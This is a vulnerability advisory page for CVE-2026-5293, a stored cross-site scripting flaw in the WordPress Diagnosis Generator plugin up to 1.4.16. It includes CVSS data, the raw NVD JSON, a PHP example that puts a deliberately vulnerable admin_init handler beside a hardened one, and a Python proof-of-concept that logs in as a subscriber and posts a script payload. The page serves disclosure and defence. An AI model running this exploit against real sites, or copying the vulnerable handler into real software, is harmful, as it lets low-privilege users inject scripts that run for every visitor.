Security Vulnerability Report
CVE-2026-5293 CVSS 6.4 MEDIUM

Published: 2026-05-20 02:16:37
Last Modified: 2026-05-20 13:54:55

Description

The 診断ジェネレータ作成プラグイン (Diagnosis Generator) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'js' parameter in versions up to and including 1.4.16. This is due to missing authorization checks and insufficient input sanitization in the themeFunc() function. The function is hooked to 'admin_init' and processes theme update requests without verifying user capabilities, allowing any authenticated user (including subscribers) to save malicious JavaScript to theme files. Additionally, the save() function uses stripslashes() which removes WordPress's magic quotes protection. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in theme files that will execute whenever a user accesses a page containing the diagnosis form shortcode.
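The two defects the description names (an admin_init handler with no capability or nonce check, and stripslashes() undoing the slashes WordPress adds to $_POST) are shown below beside a hardened handler. This is an added illustration written for this page, not the plugin's themeClass.php or a patch for it; every function, option, nonce and shortcode name (the example_diag_* names) is assumed, and a wp_options entry stands in for the theme files the plugin actually writes, so the authorization and unslashing logic stays in focus.

```php
<?php
/**
 * Added example, not the plugin's code. All example_diag_* names are hypothetical.
 * A wp_options entry stands in for the plugin's theme files.
 */

/* ---- Vulnerable pattern, as the advisory describes it --------------------- */

// admin_init runs on every wp-admin request, including admin-ajax.php and the
// profile page a Subscriber may open, so no special role is needed to reach it.
function example_diag_vuln_theme_func() {
    if ( ! isset( $_POST['js'] ) ) {
        return;
    }
    // No current_user_can() and no nonce check: any authenticated user lands here.
    // stripslashes() removes the slashes WordPress adds to $_POST, so a quoted
    // <script> payload is stored exactly as submitted.
    $js = stripslashes( $_POST['js'] );
    update_option( 'example_diag_theme_js', $js );
}
add_action( 'admin_init', 'example_diag_vuln_theme_func' );

// Front end: the stored string is concatenated into the page unescaped, so the
// script runs for every visitor who loads a page containing the shortcode.
function example_diag_vuln_shortcode() {
    return '<div class="diag-form">' . get_option( 'example_diag_theme_js', '' ) . '</div>';
}
add_shortcode( 'example_diag_vuln', 'example_diag_vuln_shortcode' );

/* ---- Hardened handler ----------------------------------------------------- */

function example_diag_safe_theme_func() {
    if ( ! isset( $_POST['example_diag_action'] ) || 'save_theme' !== $_POST['example_diag_action'] ) {
        return;
    }
    // 1. Authorization. Saving raw script is the same power as unfiltered_html,
    //    so require that capability (multisite strips it even from site admins).
    if ( ! current_user_can( 'manage_options' ) || ! current_user_can( 'unfiltered_html' ) ) {
        wp_die( 'You are not allowed to edit the diagnosis theme.', '', array( 'response' => 403 ) );
    }
    // 2. CSRF. The submitting form must carry a nonce bound to this action and user;
    //    check_admin_referer() dies on a missing or stale nonce.
    check_admin_referer( 'example_diag_save_theme', 'example_diag_nonce' );

    // 3. Unslash with the WordPress helper rather than stripslashes(), and only
    //    accept a plain string (arrays in $_POST would otherwise reach storage).
    if ( ! isset( $_POST['js'] ) || ! is_string( $_POST['js'] ) ) {
        return;
    }
    $js = wp_unslash( $_POST['js'] );
    update_option( 'example_diag_theme_js', $js );
}
add_action( 'admin_init', 'example_diag_safe_theme_func' );

// Settings form: emits the nonce the handler verifies. Rendered only for users
// who would pass the same capability test.
function example_diag_theme_form() {
    if ( ! current_user_can( 'manage_options' ) ) {
        return;
    }
    echo '<form method="post">';
    wp_nonce_field( 'example_diag_save_theme', 'example_diag_nonce' );
    echo '<input type="hidden" name="example_diag_action" value="save_theme">';
    echo '<textarea name="js">' . esc_textarea( get_option( 'example_diag_theme_js', '' ) ) . '</textarea>';
    submit_button( 'Save' );
    echo '</form>';
}

// Front end. If the field is meant to hold text rather than executable script,
// escape at output so a stored payload can no longer become markup. If custom
// JS really is the feature, the capability gate above is the control, and the
// value belongs inside a dedicated <script> element, never concatenated into HTML.
function example_diag_safe_shortcode() {
    return '<div class="diag-form">' . esc_html( get_option( 'example_diag_theme_js', '' ) ) . '</div>';
}
add_shortcode( 'example_diag_safe', 'example_diag_safe_shortcode' );
```

The split between the two shortcodes is deliberate: output escaping neutralizes stored XSS only when the feature never needs live script; when it does, the only real defense is restricting who may write the value, which is why the hardened handler checks unfiltered_html rather than just "is logged in".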

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is published for this CVE; the affected product named by the advisory is:

Diagnosis Generator (plugin slug os-diagnosis-generator) <= 1.4.16

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Exploit Title: WordPress Diagnosis Generator <= 1.4.16 Stored XSS
# Date: 2026-05-20
# Vulnerable Endpoint: any wp-admin request reaches the 'admin_init' hook;
# wp-admin/admin.php is used here. The request parameters below are the PoC
# author's guess ("update_theme" is hypothetical); only the 'js' parameter
# name comes from the advisory.

target_url = "http://example.com/wp-admin/admin.php"
login_url = "http://example.com/wp-login.php"

# Attacker credentials (Subscriber level)
username = "attacker"
password = "password"

# Malicious payload to be saved in theme files
payload = "<script>alert('XSS - CVE-2026-5293');</script>"

session = requests.Session()

# 1. Authenticate as a low-privilege user.
# A GET first picks up the wordpress_test_cookie that wp-login.php sets.
session.get(login_url)
login_data = {
    "log": username,
    "pwd": password,
    "wp-submit": "Log In",
    "redirect_to": target_url,
}
session.post(login_url, data=login_data)

# wp-login.php answers 200 even on a bad password, so check for the
# wordpress_logged_in_* cookie rather than the status code.
if not any(c.startswith("wordpress_logged_in_") for c in session.cookies.keys()):
    raise SystemExit("[-] Login failed; no wordpress_logged_in_ cookie was set.")

# 2. Send the request that triggers themeFunc() on admin_init.
exploit_data = {
    "action": "update_theme",  # Hypothetical action triggering the hook
    "js": payload,
}
response = session.post(target_url, data=exploit_data)

# A 200 only means the admin page loaded; confirm by viewing a page that
# renders the diagnosis form shortcode.
if response.status_code == 200:
    print("[+] Payload sent. Check pages with the diagnosis form shortcode.")
else:
    print(f"[-] Request failed with HTTP {response.status_code}.")

References

https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/tags/1.4.16/class/themeClass.php#L26
https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/tags/1.4.16/class/themeClass.php#L39
https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/tags/1.4.16/diagnosisAdminClass.php#L409
https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/tags/1.4.16/include_files/user-viewFormPage.php#L102
https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/trunk/class/themeClass.php#L26
https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/trunk/class/themeClass.php#L39
https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/trunk/diagnosisAdminClass.php#L409
https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/trunk/include_files/user-viewFormPage.php#L102
https://www.wordfence.com/threat-intel/vulnerabilities/id/c5293c0f-90b0-41df-a623-90297d998c41?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5293", "sourceIdentifier": "[email protected]", "published": "2026-05-20T02:16:37.053", "lastModified": "2026-05-20T13:54:54.890", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The 診断ジェネレータ作成プラグイン (Diagnosis Generator) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'js' parameter in versions up to and including 1.4.16. This is due to missing authorization checks and insufficient input sanitization in the themeFunc() function. The function is hooked to 'admin_init' and processes theme update requests without verifying user capabilities, allowing any authenticated user (including subscribers) to save malicious JavaScript to theme files. Additionally, the save() function uses stripslashes() which removes WordPress's magic quotes protection. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in theme files that will execute whenever a user accesses a page containing the diagnosis form shortcode."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/tags/1.4.16/class/themeClass.php#L26", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/tags/1.4.16/class/themeClass.php#L39", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/tags/1.4.16/diagnosisAdminClass.php#L409", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/tags/1.4.16/include_files/user-viewFormPage.php#L102", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/trunk/class/themeClass.php#L26", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/trunk/class/themeClass.php#L39", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/trunk/diagnosisAdminClass.php#L409", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/trunk/include_files/user-viewFormPage.php#L102", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c5293c0f-90b0-41df-a623-90297d998c41?source=cve", "source": "[email protected]"}]}}